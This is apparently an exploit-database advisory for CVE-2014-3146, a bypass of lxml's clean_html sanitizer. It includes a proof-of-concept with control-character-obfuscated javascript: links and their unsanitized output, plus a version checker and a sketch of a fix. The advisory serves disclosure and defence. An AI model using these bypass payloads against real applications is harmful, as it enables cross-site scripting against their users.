lxml - 'clean_html' Security Bypass

Author: Maksim Kochkin
type: remote
platform: linux
port: 
date_added: 2014-04-15 
date_updated: 2016-01-03 
verified: 1 
codes: CVE-2014-3146;OSVDB-105975 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/67159/info

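The clean_html function in lxml's lxml.html.clean module is prone to a security-bypass vulnerability: it fails to strip javascript: URLs from link attributes such as href when control characters are embedded in the URL scheme.

An attacker can leverage this issue to pass script-bearing links through the sanitizer, which can lead to cross-site scripting in applications that rely on clean_html to filter untrusted HTML.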

Versions prior to lxml 3.3.5 are vulnerable.
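
The version boundary stated above can be checked with a small helper. This is a minimal sketch, not part of lxml: the names FIXED_VERSION, parse_version and is_affected are hypothetical, and the parsing assumes a plain dotted version string (any pre-release suffix such as "beta1" is ignored).

```python
import re

# First release listed as not vulnerable in this advisory.
FIXED_VERSION = (3, 3, 5)

def parse_version(version):
    """Return the leading numeric components, e.g. '3.3.4' -> (3, 3, 4)."""
    parts = []
    for piece in version.split('.'):
        match = re.match(r'\d+', piece)
        if match is None:
            break  # stop at the first non-numeric component
        parts.append(int(match.group()))
    return tuple(parts)

def is_affected(version):
    """True if the given lxml version string is older than FIXED_VERSION."""
    return parse_version(version) < FIXED_VERSION

if __name__ == '__main__':
    for candidate in ('2.3', '3.3.4', '3.3.5', '3.4.0'):
        print(candidate, is_affected(candidate))
```

With lxml installed, the string passed in could be built from lxml.etree.LXML_VERSION, which holds the version as a tuple of integers.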

from lxml.html.clean import clean_html

# Each link carries a javascript: URL. All but the first embed a control
# character (\x01 through \x09) inside the scheme name.
html = '''\
<html>
<body>
<a href="javascript:alert(0)">aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

# A safe sanitizer would blank every href above; vulnerable versions do not.
print(clean_html(html))


Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>
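
In the output above, only the plain javascript: link and the \x09 (tab) variant have their href blanked; the links built with \x01 through \x08 keep theirs. The sketch below illustrates why a whitespace-only normalization misses those cases and how stripping control characters before the scheme check catches them. It is a simplified illustration under stated assumptions, not lxml's code or its actual patch: the function names, the scheme list, and the choice of ignorable characters (0x00-0x20 and 0x7F) are all hypothetical.

```python
import re

# Assumption: script-capable schemes to reject (illustrative, not exhaustive).
SCRIPT_SCHEMES = ('javascript:', 'vbscript:')

# Assumption: ASCII control characters and space are ignorable for the check.
IGNORABLE = re.compile(r'[\x00-\x20\x7f]+')

def naive_has_script_scheme(url):
    """Strip only whitespace before checking the scheme."""
    normalized = re.sub(r'\s+', '', url).lower()
    return normalized.startswith(SCRIPT_SCHEMES)

def has_script_scheme(url):
    """Strip control characters and whitespace before checking the scheme."""
    normalized = IGNORABLE.sub('', url).lower()
    return normalized.startswith(SCRIPT_SCHEMES)

if __name__ == '__main__':
    samples = ['javascript:alert(0)',
               'javas\x01cript:alert(1)',
               'javas\x09cript:alert(1)',
               'http://example.com/']
    for url in samples:
        print(repr(url), naive_has_script_scheme(url), has_script_scheme(url))
```

The normalized string is used only for the decision; a sanitizer built this way would still need to drop or rewrite the original attribute value when the check returns True.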